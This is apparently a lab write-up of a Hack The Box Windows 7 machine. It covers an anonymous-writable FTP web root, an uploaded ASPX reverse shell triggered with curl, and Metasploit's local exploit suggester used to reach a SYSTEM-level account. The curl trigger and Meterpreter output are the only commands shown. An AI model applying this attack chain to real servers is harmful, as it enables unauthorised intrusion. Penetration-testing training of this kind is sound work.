Summary:
vulnerable software : MSII/7.5 ftp webroot exposed and writable
system vulnerable : 10.10.10.5
vulnerability explanation :
privilege escalation: kernel pool overflow in Win32k
severity : critical
Enumeration:
Nmap shows that Microsoft FTP server is used to provide web content of the wwwroot folder. This can be dangerous if the server allows read and write access to its folder. It seems like it does in this case:
Filezilla showing uploaded shell.aspx crafted by an attacker.
Once we trigger the uploaded shell we get a connection back from the server:
1
curl -k http://10.10.10.5/shell.aspx
Copied!
Next we run local_exploit_suggester to find possible kernel privilege escalation methods on this Windows 7 Box.
1
meterpreter > sysinfo
2
Computer : DEVEL
3
OS : Windows 7 (Build 7600).
4
Architecture : x86
5
System Language : el_GR
6
Domain : HTB
7
Logged On Users : 0
8
Meterpreter : x86/windows
9
​
Copied!
Metasploit exploit_suggester came up with few exploit matching the architecture of the victim:
Metasploit local enumeration
Due to unpatched system being put in place many of the above suggestions were successfully executed on the target providing potential attacker with the NT_AUTHORITY level account: